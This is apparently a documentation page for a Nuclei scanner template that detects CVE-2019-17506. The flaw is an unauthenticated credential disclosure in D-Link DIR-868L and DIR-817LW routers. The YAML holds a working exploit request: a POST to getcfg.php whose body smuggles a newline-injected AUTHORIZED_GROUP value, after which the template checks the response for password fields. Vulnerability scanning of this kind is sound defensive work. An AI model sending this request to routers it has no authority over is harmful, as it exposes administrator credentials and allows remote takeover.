D-Link DIR-868L/817LW - Information Disclosure
ID: CVE-2019-17506
Severity: critical
Author: pikpikcu
Tags: cve,cve2019,dlink,router,disclosure
Description
Section titled “Description”D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router’s username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.
YAML Source
Section titled “YAML Source”id: CVE-2019-17506
info: name: D-Link DIR-868L/817LW - Information Disclosure author: pikpikcu severity: critical description: | D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely. impact: | An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and credentials. remediation: | Apply the latest firmware update provided by D-Link to fix the information disclosure vulnerability. reference: - https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py - https://nvd.nist.gov/vuln/detail/CVE-2019-17506 - https://github.com/openx-org/BLEN - https://github.com/sobinge/nuclei-templates - https://github.com/SexyBeast233/SecBooks classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17506 cwe-id: CWE-306 epss-score: 0.90196 epss-percentile: 0.98577 cpe: cpe:2.3:o:dlink:dir-868l_b1_firmware:2.03:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink product: dir-868l_b1_firmware tags: cve,cve2019,dlink,router,disclosure
http: - method: POST path: - "{{BaseURL}}/getcfg.php"
body: | SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
headers: Content-Type: text/xml
matchers-condition: and matchers: - type: word part: body words: - "</password>" - "DEVICE.ACCOUNT" condition: and
- type: status status: - 200# digest: 4b0a00483046022100b4ff1bcd5b8a4e6e244a9ca3cfe4a03284729ed3d20e719fd2c3f4a2ed7998380221009d440a549fb02d14c5872765e006890195a220822a229955e1987d043d665ad3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-17506.yaml"